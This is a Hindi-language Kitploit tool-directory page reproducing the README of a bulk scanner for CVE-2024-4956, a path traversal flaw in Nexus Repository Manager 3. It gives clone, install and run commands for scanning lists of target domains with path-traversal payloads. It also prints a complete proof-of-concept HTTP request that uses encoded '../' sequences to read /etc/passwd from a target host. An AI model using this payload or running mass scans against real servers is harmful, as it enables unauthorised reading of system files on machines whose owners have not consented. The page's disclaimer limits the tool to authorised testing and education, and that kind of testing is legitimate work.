Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-4956-Bulk-Scanner — [CVE-2024-4956] Nexus Repository Manager 3 अप्रमाणित Path Traversal सामूहिक स्कैनर | Kitploit
उपकरण/GitHubGitHub/ifconfig-me/cve-2024-4956-bulk-scanner
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubifconfig-me/cve-2024-4956-bulk-scanner

CVE-2024-4956-Bulk-Scanner

[CVE-2024-4956] Nexus Repository Manager 3 अप्रमाणित Path Traversal सामूहिक स्कैनर

रिपॉजिटरी देखें
176152 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

README.md

CVE-2024-4956 बल्क स्कैनर

अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों और कॉर्पोरेट वातावरण में परीक्षण के लिए है। https://twitter.com/nav1n0x/ और https://github.com/ifconfig-me इस कोड के दुरुपयोग की कोई जिम्मेदारी नहीं लेते हैं। इसे अपने जोखिम पर उपयोग करें। ऐसे लक्ष्य पर हमला न करें जिससे आपको जुड़ने की अनुमति नहीं है। यह उपकरण सार्वजनिक रूप से जारी पेलोड का उपयोग करता है।

यह स्कैनर सुरक्षा उत्साही लोगों को नेक्सस रिपॉजिटरी लक्ष्यों पर बल्क में पथ ट्रैवर्सल भेद्यता (Path Traversal Vulnerability) को स्कैन करने में मदद करता है।

स्कैनर लोड किए गए लक्ष्यों की संख्या और वर्तमान स्कैनिंग की स्थिति दिखाएगा। URL को परिणामों के आधार पर तीन स्थिति संदेशों के साथ सूचीबद्ध किया जाएगा: टाइमआउट (Timeout), विफल (Fail), या सफल (Success)। सुनिश्चित करें कि targets.txt में डोमेन की सूची और lfi-payloads.txt में पेलोड की सूची है। स्कैनर वर्तमान में परीक्षण किए जा रहे URL को प्रदर्शित करेगा, प्रत्येक नए अनुरोध के साथ अपडेट होगा, और क्रमशः सफलता या विफलता का संकेत देगा। स्क्रिप्ट सफल URL की एक सूची को successful_urls.txt के रूप में निर्देशिका में सहेजती है। यह अंत में सफल प्रयासों की संख्या का सारांश प्रदान करेगी।

स्थापना

सुनिश्चित करें कि आपके पास Python 3.6+ और pip स्थापित है।

  1. रिपॉजिटरी को क्लोन करें:

    • git clone https://github.com/ifconfig-me/CVE-2024-4956-Bulk-Scanner.git
    • cd CVE-2024-4956-Bulk-Scanner
  2. आवश्यक निर्भरताएँ स्थापित करें:

    pip install -r requirements.txt

उपयोग निर्देश

  1. अपनी targets.txt फ़ाइल डोमेन की सूची के साथ और lfi-payloads.txt फ़ाइल पेलोड की सूची के साथ तैयार करें।

  2. स्कैनर चलाएँ:

    python3 CVE-2024-4956-scanner.py -d targets.txt -p lfi-payloads.txt

PoC

GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
Host: target.com:8081
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

सफल हमला

image

स्कैनर क्रिया में

image

अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों और कॉर्पोरेट वातावरण में परीक्षण के लिए है। https://twitter.com/nav1n0x/ और https://github.com/ifconfig-me कोड की कोई जिम्मेदारी नहीं लेते हैं। इसे अपने जोखिम पर उपयोग करें। ऐसे लक्ष्य पर हमला न करें जिससे आपको जुड़ने की अनुमति नहीं है।

टूल डाउनलोड करें